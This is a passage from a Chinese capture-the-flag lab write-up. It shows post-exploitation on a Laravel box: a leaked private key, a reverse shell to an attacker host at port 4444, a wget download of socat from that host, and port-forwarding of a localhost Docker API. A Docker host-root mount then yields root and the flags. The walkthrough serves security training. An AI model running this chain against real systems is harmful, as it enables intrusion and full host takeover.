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
V1Pdrh+BgWgBTYRDT0bBEUMoxEUpgwo=
-----END PRIVATE KEY-----

给出了docker api的认证凭证,那么就可以操作dockerapi
查看监听的端口

1
2
3
4
5
6
7
8
9
10
11
12
netstat -alnpt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:2376          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      -
tcp        0     54 192.168.2.32:37271      192.168.2.4:4444        ESTABLISHED 3233/sh
tcp        9      0 127.0.0.1:9000          127.0.0.1:33776         CLOSE_WAIT  -
tcp        0      0 :::22                   :::*                    LISTEN      -
tcp        0      0 :::8000                 :::*                    LISTEN      -

先转发一下端口

1
2
3
4
5
6
7
8
9
10
wget http://192.168.2.4:800/socat
ls -la
total 372
drwxrwxrwt    4 root     root           100 Jan  7 17:23 .
drwxr-xr-x   21 root     root          4096 Jun  3  2025 ..
drwxrwxrwt    2 root     root            40 Jan  7 15:38 .ICE-unix
drwxrwxrwt    2 root     root            40 Jan  7 15:38 .X11-unix
-rw-r--r--    1 nobody   nobody      375176 Jan  7 17:23 socat
chmod +x socat
./socat TCP-LISTEN:2377,fork,bind=0.0.0.0 TCP:127.0.0.1:2376 &

对接口进行连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@miao:/tmp/certs# docker --tls --tlscacert=ca.pem --tlscert=client-cert.pem --tlskey=client-key.pem -H=tcp://192.168.2.32:2377 version
Client:
 Version:           27.5.1
 API version:       1.47
 Go version:        go1.22.2
 Git commit:        27.5.1-0ubuntu3~22.04.2
 Built:             Mon Jun  2 12:18:38 2025
 OS/Arch:           linux/amd64
 Context:           default

Server:
 Engine:
  Version:          28.3.3
  API version:      1.51 (minimum version 1.24)
  Go version:       go1.24.11
  Git commit:       bea959c7b793b32a893820b97c4eadc7c87fabb0
  Built:            Tue Dec  2 23:05:51 2025
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          v2.1.5
  GitCommit:        fcd43222d6b07379a4be9786bda52438f0dd16a1
 runc:
  Version:          1.3.4
  GitCommit:        d842d7719497cc3b774fd71620278ac9e17710e0
 docker-init:
  Version:          0.19.0
  GitCommit:

查看docker镜像

1
2
3
root@miao:/tmp/certs# docker --tls --tlscacert=ca.pem --tlscert=client-cert.pem --tlskey=client-key.pem -H=tcp://192.168.2.32:2377 ps -a
CONTAINER ID   IMAGE          COMMAND                   CREATED       STATUS       PORTS                                       NAMES
f59b9418f1ad   laravel-vuln   "docker-php-entrypoi…"   10 days ago   Up 2 hours   0.0.0.0:8000->8000/tcp, :::8000->8000/tcp   hardcore_keller

进行提权

1
2
3
root@miao:/tmp/certs# docker --tls --tlscacert=ca.pem --tlscert=client-cert.pem --tlskey=client-key.pem -H=tcp://192.168.2.32:2377 run -v /:/mnt --rm -it laravel-vuln chroot /mnt sh
/ # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

四、查看FLAG

1
2
3
/ # cat /root/root.txt /home/alice/user.txt 
flag{root-ede49d353365dfcf95b6bf8df1b7a2dc}
flag{user-0e5b3d83a8c1221b25d34e824decc1e7}
Maze-sec
#cms-Laravel #CVE-2021-3129 #提权-docker
Lara
http://miao-sec.github.io/Maze-sec/Lara/
作者
Miao
发布于
2026年1月9日
许可协议
BY-MIAO